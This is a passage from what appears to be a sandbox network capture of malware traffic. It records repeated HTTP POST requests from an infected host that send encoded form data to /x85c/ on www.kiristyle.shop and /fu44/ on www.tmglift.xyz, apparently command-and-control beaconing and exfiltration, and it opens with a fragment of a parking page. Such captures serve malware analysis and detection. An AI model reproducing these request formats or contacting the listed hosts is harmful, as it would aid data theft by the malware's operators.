Aug 27, 2024 17:51:09.233947992 CEST	1289	IN	Data Raw: 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 74 65 6d 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 73 73 6c 2d 70 72 6f 74 65 63 Data Ascii: ></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title
Aug 27, 2024 17:51:09.234066010 CEST	1289	IN	Data Raw: 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 2c 20 31 29 22 20 73 Data Ascii: king-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; }
Aug 27, 2024 17:51:09.234162092 CEST	1289	IN	Data Raw: 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 3a 20 27 69 6e 6e 65 72 54 65 78 74 27 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 4e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 2e 6d 61 74 63 68 28 Data Ascii: ody ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--\|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( domainName ); document.ti
Aug 27, 2024 17:51:09.234173059 CEST	408	IN	Data Raw: 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0a 20 20 20 20 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 20 22 73 63 72 69 70 74 22 2c 20 22 68 74 74 70 73 3a 2f 2f 6d 63 2e 79 61 6e 64 65 78 2e 72 75 2f 6d 65 74 72 69 6b 61 2f 74 61 Data Ascii: ertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(54200914, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div>

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.11.20	49872	35.244.245.121	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:15.359217882 CEST	794	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 45 48 78 72 36 56 39 43 72 67 78 2b 56 34 53 65 78 41 37 79 62 2f 39 6f 6e 38 79 6d 55 77 69 48 56 70 51 33 34 66 38 6b 57 4b 7a 65 31 58 67 47 64 6c 37 6b 58 7a 39 30 6a 69 4d 50 63 42 75 4f 4a 66 4c 68 75 41 36 48 7a 5a 30 69 4d 44 76 4b 50 55 72 35 68 39 78 4d 4f 38 46 6a 70 4a 70 38 77 71 74 46 72 54 4a 6e 49 57 33 69 4c 4e 79 4b 59 43 53 47 55 2b 64 4f 34 4a 4d 4a 2f 63 71 34 63 33 45 65 56 63 52 56 35 2b 53 69 49 79 66 66 54 36 6f 78 4d 49 32 38 46 38 43 6c 30 35 47 4a 66 4b 75 39 31 71 59 45 38 2f 2b 39 45 6b 64 55 54 72 7a 74 67 3d 3d Data Ascii: AvLLLbOh=V1Oow1vp6cnMKEHxr6V9Crgx+V4SexA7yb/9on8ymUwiHVpQ34f8kWKze1XgGdl7kXz90jiMPcBuOJfLhuA6HzZ0iMDvKPUr5h9xMO8FjpJp8wqtFrTJnIW3iLNyKYCSGU+dO4JMJ/cq4c3EeVcRV5+SiIyffT6oxMI28F8Cl05GJfKu91qYE8/+9EkdUTrztg==
Aug 27, 2024 17:51:15.513927937 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:51:15 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.11.20	49873	35.244.245.121	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:17.985713005 CEST	1134	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 6b 69 48 78 74 51 30 36 33 38 6a 57 4b 7a 56 56 57 6f 4c 39 6c 77 6b 58 76 44 30 6d 43 4d 50 63 56 75 50 34 2f 4c 71 2b 41 35 49 6a 5a 7a 6a 4d 44 75 4f 50 55 74 35 68 78 58 4d 50 6f 46 6a 64 35 70 39 79 43 74 54 75 2f 57 77 59 57 78 6b 4c 4e 78 44 34 43 55 47 55 6a 71 4f 38 49 33 4a 4a 55 71 2f 38 58 45 66 56 63 65 66 4a 2f 61 67 49 7a 78 51 52 54 58 34 50 49 56 36 69 6b 33 74 68 42 54 50 76 69 33 2f 6b 61 6b 51 4d 6a 47 6b 6e 56 70 43 77 47 6f 2f 56 77 4d 6c 6e 75 6a 44 4b 76 4a 55 46 4b 4f 48 75 61 41 5a 72 68 67 79 53 47 75 52 45 66 4c 57 6d 76 6a 65 69 70 58 31 59 51 30 69 4f 6a 76 36 5a 54 6f 35 38 2f 37 50 57 74 73 61 70 65 69 4e 49 79 62 55 41 78 4d 65 47 46 54 2f 4b 64 51 39 47 77 79 53 77 4e 56 51 74 48 70 75 67 4e 4b 74 79 64 46 70 67 34 54 41 63 38 32 4b 66 76 4e 57 52 55 32 6c 56 43 4c 77 75 4f 6f 4d 6a 75 6a 68 76 50 35 65 54 64 63 4e [TRUNCATED] Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimGkiHxtQ0638jWKzVVWoL9lwkXvD0mCMPcVuP4/Lq+A5IjZzjMDuOPUt5hxXMPoFjd5p9yCtTu/WwYWxkLNxD4CUGUjqO8I3JJUq/8XEfVcefJ/agIzxQRTX4PIV6ik3thBTPvi3/kakQMjGknVpCwGo/VwMlnujDKvJUFKOHuaAZrhgySGuREfLWmvjeipX1YQ0iOjv6ZTo58/7PWtsapeiNIybUAxMeGFT/KdQ9GwySwNVQtHpugNKtydFpg4TAc82KfvNWRU2lVCLwuOoMjujhvP5eTdcNeeso3nwQg3fHqZPQ2eOdlYsla0HDweG7Nd8F1Y4fZpUxkjgPSgGAAgf6W8DXL19e8UQaHbkaWPsgo7vrBM4xZ1WQykKG2Tzdpm3c4+k8ZBm86dtvooBWF4BouD0zCrqu0F7gYn5dtPVatS3Ca8yaPlbj/vmqZjm1NgHlSBbZLqMWKfrF2yO9R9M/niXs+0urXzddjI7J88Tu9c=
Aug 27, 2024 17:51:18.154844046 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:51:18 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.11.20	49874	35.244.245.121	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:20.611572027 CEST	2578	OUT	POST /x85c/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/x85c/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 31 4f 6f 77 31 76 70 36 63 6e 4d 4b 6c 33 78 34 49 39 39 45 4c 67 77 37 56 34 53 58 52 41 2f 79 62 7a 39 6f 6a 45 69 6d 47 38 69 48 6b 35 51 7a 72 33 38 69 57 4b 7a 4a 6c 57 70 4c 39 6c 58 6b 58 6e 35 30 6d 48 35 50 66 74 75 4f 70 76 4c 71 4d 34 35 44 7a 5a 79 76 73 44 6f 4b 50 56 32 35 68 39 35 4d 4d 55 56 6a 74 6c 70 38 78 32 74 43 4e 6e 4a 79 49 57 33 6b 4c 4e 74 4f 59 44 70 47 55 33 36 4f 38 30 33 4a 4c 67 71 35 4f 76 45 5a 45 63 65 57 35 2f 5a 6d 34 7a 79 5a 78 53 74 34 50 63 42 36 69 6b 34 74 6c 35 54 50 73 47 33 38 6e 69 6e 52 73 6a 47 36 33 56 71 51 41 4b 73 2f 55 59 55 6c 6d 71 6a 44 4e 54 4a 56 6c 4b 4f 52 63 79 44 64 4c 68 6d 32 53 48 34 41 55 6a 44 57 69 48 64 65 6e 35 58 32 6f 55 30 74 5a 50 76 38 34 54 6f 77 38 2f 75 44 47 73 32 52 4a 65 2b 4e 4d 57 68 55 41 52 36 65 45 4a 54 75 61 39 51 33 43 6b 74 47 67 4d 51 4a 74 48 34 6b 41 42 47 74 7a 73 61 70 67 35 4f 41 5a 63 32 4a 76 2f 4e 58 55 67 31 6e 46 43 41 39 4f 50 77 43 7a 69 54 68 73 71 32 65 53 6c 71 4e [TRUNCATED] Data Ascii: AvLLLbOh=V1Oow1vp6cnMKl3x4I99ELgw7V4SXRA/ybz9ojEimG8iHk5Qzr38iWKzJlWpL9lXkXn50mH5PftuOpvLqM45DzZyvsDoKPV25h95MMUVjtlp8x2tCNnJyIW3kLNtOYDpGU36O803JLgq5OvEZEceW5/Zm4zyZxSt4PcB6ik4tl5TPsG38ninRsjG63VqQAKs/UYUlmqjDNTJVlKORcyDdLhm2SH4AUjDWiHden5X2oU0tZPv84Tow8/uDGs2RJe+NMWhUAR6eEJTua9Q3CktGgMQJtH4kABGtzsapg5OAZc2Jv/NXUg1nFCA9OPwCziThsq2eSlqNfaspXnwVHrYNaZUdWeQeVZzlaJuDxa468B8EFo4IZpT1EjkBygMKggf6WByXLx9dIYQbwXkRnPsio7trBMTxZp1QycgGyvNdv23dpOkvtVh4Kdorooacl0Woqq7zC7UuD17hY35XNPWRdS8Fa9xQvpfj/zYqYX21KcHlUw5C4GVHZrXZFGF2hRE4EWI8YwehAr0TQsVSNs7w6zaUxlFwZhvqwGmL0qZRFZ9Hcth4OzKFvKtW16UA3X6Xrd1DnjkGj1uSf0ctbFnkMVMQZ8Pop8VzekJvrlS9oYHj57NcBB4p8y4sRIvD81FvIQ7N7fvHn0iS8NDKqJHCMWB6j/ht7jhLVVWUN/zENP3MF1h8Fa4JYloDKUUOrjtuExj0x8n8dgawwlhOD3E+drgh6yeItSLwQ1nWptjS0IJ3p0iQJ3/NWkp212G5wYzQmNM6se0hpCq+9RTseYrJBosj8NV7q32X+/x/XrK32bFK5NxewFAETdTqN3XhhLnvwJH3DD+zvaXAXiRkLNGwWpLRwYEkEx70599NA+4Thgqyj3+Vu66K0g4Wo1gXeCyr2BH0mms0HOSF8pLoWgMwY7JSV7qRxPLDBrlJp8DgFvvcX3yhERLnru2ZPN3vgDIYv63sKmyQVmDCFuDsUrJX2qKDPQE9QeQKsFDHdXVTeD [TRUNCATED]
Aug 27, 2024 17:51:20.611654043 CEST	10312	OUT	Data Raw: 44 79 51 72 6d 6f 56 6e 7a 4e 37 70 2b 70 52 2b 43 51 76 6a 6e 49 48 70 6b 33 63 72 38 62 49 4a 62 7a 50 57 4c 4f 70 79 64 38 42 31 38 63 71 2b 2f 6c 61 53 4b 39 74 48 50 56 77 46 56 68 72 2b 44 44 41 72 6a 32 2f 2b 39 62 76 2b 2b 68 52 38 7a 6a Data Ascii: DyQrmoVnzN7p+pR+CQvjnIHpk3cr8bIJbzPWLOpyd8B18cq+/laSK9tHPVwFVhr+DDArj2/+9bv++hR8zj79rvEMY27xFJ23kT/z5TT2s+hCOEGAE8Wgc9XDWA9kGpiIBVSd61nhCG6P/ptzps3e8JF8CsMDYgKvVpsb8vESWRQT/Rg0twgUVFs/GKti2FuHY+cBAa3wdVfysu7s9OBb2SizhDWxZy49ugCcjcORENr4G1XbQOV
Aug 27, 2024 17:51:20.709819078 CEST	1289	OUT	Data Raw: 5a 69 35 50 4b 76 70 62 6c 44 64 2b 62 66 71 6b 42 46 71 6d 4e 38 4b 38 2f 70 72 36 68 5a 48 70 58 4e 37 41 37 70 57 4d 61 77 39 69 66 48 48 44 34 56 7a 69 53 6a 6e 4f 71 61 39 69 34 65 74 57 56 63 48 6e 48 44 34 4c 59 75 5a 30 71 31 74 69 38 63 Data Ascii: Zi5PKvpblDd+bfqkBFqmN8K8/pr6hZHpXN7A7pWMaw9ifHHD4VziSjnOqa9i4etWVcHnHD4LYuZ0q1ti8cUvPq2GQrPaYO9pVxhncr8AhZS5RFuA8Ourn4XsC+BPST/egm04toyiwFnTeb+hwmPitOR4KcW4Q7xJxPYfelN0mwCZoIao/U3nMnuvMrWIPvRGcTRulGNw9UdJaqQRTmN3ycSyqTEuana9Sw9QoT8nNT7QKEHvSBc
Aug 27, 2024 17:51:20.709904909 CEST	2578	OUT	Data Raw: 47 4c 49 45 73 30 48 67 67 52 38 50 43 4d 68 37 48 62 48 74 55 42 50 6d 71 30 5a 73 76 45 35 44 30 44 56 6a 37 34 56 56 47 6a 64 34 38 64 34 52 53 39 56 38 58 6a 33 31 67 61 6c 44 66 33 4c 6a 56 65 63 2f 6a 36 72 4d 57 42 4d 4b 4d 73 38 4a 62 54 Data Ascii: GLIEs0HggR8PCMh7HbHtUBPmq0ZsvE5D0DVj74VVGjd48d4RS9V8Xj31galDf3LjVec/j6rMWBMKMs8JbT/Q2YWRYhY1LUqPb3qvKXd+S0OFfCTWRj1FTc1ujunv+6UPMqqD0h1v5xhAp9koU/lUTSyOyHuluFTFAQj42EJ3XLs506fQks16ax6rQAKgql784iqGPA+NtkM98tquUQ8o9Kh87teo+0SIe8NIPzgJyDuMIfWLa0o
Aug 27, 2024 17:51:20.709916115 CEST	3867	OUT	Data Raw: 55 4c 70 31 74 65 77 43 74 70 74 38 6e 39 42 43 5a 62 65 67 77 54 57 79 47 65 78 6d 46 76 46 4e 4f 6d 78 6d 47 2f 70 5a 75 69 5a 63 5a 32 6f 66 6d 6e 44 46 42 65 35 4e 45 4d 77 61 4a 74 5a 6e 44 53 4e 55 53 5a 4c 79 42 69 76 38 61 56 2b 32 4b 63 Data Ascii: ULp1tewCtpt8n9BCZbegwTWyGexmFvFNOmxmG/pZuiZcZ2ofmnDFBe5NEMwaJtZnDSNUSZLyBiv8aV+2Kc3BcGNtXHeMMyvutMqisDOguYYGbxMFkWhZzs+41FpWuIPRsfQuEY+3o1dv43C1ysQ7HQptIPgzJKlEV6/UveI3Had+3kCTG2Igywu4bI/oGUtGyT17jjpZnZ4dRjTRomWW4BTp2V+m7Q8dwyirnpo/sAkIkKmZXv7
Aug 27, 2024 17:51:20.710110903 CEST	5156	OUT	Data Raw: 6f 4d 47 68 59 59 59 69 50 78 77 62 2f 78 59 66 48 56 63 58 36 43 63 64 6d 66 64 32 36 38 6e 6f 5a 7a 73 30 7a 58 30 76 50 46 33 74 2b 4c 57 42 68 50 4b 65 58 78 50 70 4b 4d 59 59 6e 58 66 61 36 69 64 74 32 43 35 62 7a 4d 50 49 6f 44 78 57 69 61 Data Ascii: oMGhYYYiPxwb/xYfHVcX6Ccdmfd268noZzs0zX0vPF3t+LWBhPKeXxPpKMYYnXfa6idt2C5bzMPIoDxWiabzW7aHbmc0IaDfsE7LqO7eiiUIx7fI1ZLB2DwG0PxxC36pb2YgzB6dWz4Wo/hZdoyUDi40109X66S19bO6z07Ah8Y5+q/bYOoiFDPvfvB4hJhMpza58b1ulkw/0qwEOJmHtyYxRiHfnHTHx/dPsg3tSVU7alemcK4
Aug 27, 2024 17:51:20.710278034 CEST	5156	OUT	Data Raw: 52 35 41 5a 66 78 71 73 49 77 57 39 32 4a 43 6f 57 47 61 42 58 39 41 57 6c 64 6c 35 47 76 68 41 6a 66 30 63 43 39 76 46 41 41 55 67 70 4e 35 61 61 6d 4b 53 7a 53 54 6d 52 43 6e 6d 4e 67 52 35 37 69 32 6d 32 31 4a 42 44 37 45 35 6d 48 47 2b 2f 52 Data Ascii: R5AZfxqsIwW92JCoWGaBX9AWldl5GvhAjf0cC9vFAAUgpN5aamKSzSTmRCnmNgR57i2m21JBD7E5mHG+/RpUciDPpZSjKZSCzBQUrZ/l4sGEccyKKkmO3L2Ss0t/cPWHzlIBsXCA3qG4UO4Akc2ErlUj596n4bhDp5lEuTdzh+BTIQ5hHeY6T6DKYT7UpkqkNAVxkGDNfSWNRAl0DG5gXcuR/x2ta15QXA8td3EFDShjpNxC+wB
Aug 27, 2024 17:51:20.710448980 CEST	1289	OUT	Data Raw: 58 74 56 57 4c 49 45 71 72 35 4c 4f 7a 64 42 58 51 43 7a 78 63 38 58 6a 5a 39 67 4e 58 45 50 65 54 36 58 2f 6d 59 56 6c 56 41 6d 31 4a 52 79 4d 50 34 75 37 68 32 65 63 36 5a 42 65 45 50 31 43 52 51 52 62 57 55 74 74 68 57 70 65 37 45 64 5a 72 69 Data Ascii: XtVWLIEqr5LOzdBXQCzxc8XjZ9gNXEPeT6X/mYVlVAm1JRyMP4u7h2ec6ZBeEP1CRQRbWUtthWpe7EdZriedGcavkm/0RkjkKOshvX0cpPgyi7iUD8WKeYBJYMZd1PiI8CBRAHNQs6MSkc6RD6nkicYTI7bpucc0TItWsGOmQp8LuGtnSnqTDBeoYTT8pWPdVA5WVNLvnuSqLpE9NAjMlyjx7Q46IplvpdHk2uWvicFKfQqAvNq
Aug 27, 2024 17:51:20.710597038 CEST	6445	OUT	Data Raw: 57 50 42 56 36 44 42 35 37 31 77 72 58 48 39 2f 4b 64 79 36 52 38 30 4d 64 50 68 6c 4a 49 54 37 6a 4e 44 4a 35 72 59 70 59 54 37 69 47 54 6f 4c 5a 37 4c 59 49 36 49 58 54 7a 45 45 54 56 71 57 57 71 78 4b 7a 5a 79 6f 66 78 4c 41 77 4b 35 38 48 4f Data Ascii: WPBV6DB571wrXH9/Kdy6R80MdPhlJIT7jNDJ5rYpYT7iGToLZ7LYI6IXTzEETVqWWqxKzZyofxLAwK58HO+ircsp/jDB+Bg7h0K8UZos8CmpYPG5irN2/FZDGLgMRMjDEFlZS9E1ZUISX06zNM53Yrt5jCm6u5J5mUMGWOSskVdWfzH7jcP2vVzgpYmS9gOKqIMyqEcbcuGF9VV6B0LuPynAmV8ZoSjJ7N3C999EbW8XOCpXjgA
Aug 27, 2024 17:51:20.780950069 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:51:20 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Aug 27, 2024 17:51:20.807861090 CEST	2578	OUT	Data Raw: 50 77 49 6f 45 77 44 7a 54 56 76 74 36 59 50 76 77 2b 31 37 4a 41 6e 33 68 49 4c 6e 49 66 6c 35 2f 54 67 65 6c 53 4a 36 4e 6e 55 71 6e 53 58 6a 71 5a 6e 63 4d 4c 30 73 43 79 6c 44 67 34 30 49 53 33 6e 68 38 42 51 39 44 34 57 79 61 76 7a 55 61 79 Data Ascii: PwIoEwDzTVvt6YPvw+17JAn3hILnIfl5/TgelSJ6NnUqnSXjqZncML0sCylDg40IS3nh8BQ9D4WyavzUayz9+OEa/tU60A4b0huiG/C9sxzJsc92j62WCvFbFy4xcZu7WOKmBidr5J17wz/w8HmQGLFuV85JPQ/yG9Em4+FJM/8UYzwBQrt4m4eb5sftrXLEJv9n1HgXjDXPcYe4/GbBl5Y3ZZY48liAidcNZ3peoL7re71lmwe
Aug 27, 2024 17:51:20.808011055 CEST	2578	OUT	Data Raw: 76 61 79 6e 67 64 46 52 70 79 43 6c 48 6c 33 63 32 33 54 70 78 39 5a 4e 4d 68 6b 44 7a 59 79 35 4c 77 69 55 4d 78 51 64 51 68 6f 55 42 77 55 56 6b 5a 59 31 57 47 2b 51 49 66 30 37 50 39 55 61 70 73 34 58 46 38 6a 66 4b 51 4e 63 6d 49 57 63 74 6a Data Ascii: vayngdFRpyClHl3c23Tpx9ZNMhkDzYy5LwiUMxQdQhoUBwUVkZY1WG+QIf07P9Uaps4XF8jfKQNcmIWctj0RDtN6TIXbFUIAsrbWlrARphiv/1iFVrj+qLIjWE7RniDTP8XEBx2IS00eCXusm6JMCgqzJEqd3AE7yi+5UMSZpCkenAMwbI96DqMzYNYBMqEquB2K3YwskOl/ZW2SMZkDOw08BOIeNjY2ALEAwNFntnqv++DXg5e

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.11.20	49875	35.244.245.121	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:23.247764111 CEST	527	OUT	GET /x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.kiristyle.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:51:23.416874886 CEST	500	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 27 Aug 2024 15:51:23 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/x85c/?AvLLLbOh=Y3mIzDGxysayARzY45AnHIIy2B4pc2sd+rPTtixWlkJfFxNC1K7RiT+8e26JUdxdhynJ2ADdGNEqJqOO4cICPBs0jMW0AIUC/yJyUu4ejJJDyAbCIM7A/9A=&7RB=66nPyLG8 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.11.20	49876	85.159.66.93	80

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:51:28.654114008 CEST	785	OUT	POST /fu44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.tmglift.xyz Origin: http://www.tmglift.xyz Referer: http://www.tmglift.xyz/fu44/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 43 52 76 4b 78 42 34 49 2b 65 54 4f 62 54 49 37 78 6b 5a 6e 71 6d 71 79 56 58 6b 52 64 44 73 49 46 43 39 53 50 78 79 6d 76 31 54 4b 2f 50 53 72 72 78 4a 6f 37 2f 7a 70 66 47 47 62 63 67 55 4e 50 74 33 78 39 53 6d 34 52 58 64 49 50 35 4f 2b 59 65 6c 72 75 59 6c 5a 75 51 6c 73 77 70 55 62 75 6a 63 4a 68 63 48 33 77 70 57 52 45 4c 63 68 62 41 4e 74 5a 55 44 6d 6a 4f 50 4a 55 65 49 30 51 48 59 31 59 7a 69 2b 54 6a 5a 30 43 65 38 52 33 76 51 2b 55 53 4c 46 55 63 55 41 44 6d 4d 63 67 4e 2b 5a 47 5a 67 72 2f 56 58 46 71 32 78 34 4b 50 36 61 6d 67 3d 3d Data Ascii: AvLLLbOh=BnjbCdG17bAwCRvKxB4I+eTObTI7xkZnqmqyVXkRdDsIFC9SPxymv1TK/PSrrxJo7/zpfGGbcgUNPt3x9Sm4RXdIP5O+YelruYlZuQlswpUbujcJhcH3wpWRELchbANtZUDmjOPJUeI0QHY1Yzi+TjZ0Ce8R3vQ+USLFUcUADmMcgN+ZGZgr/VXFq2x4KP6amg==
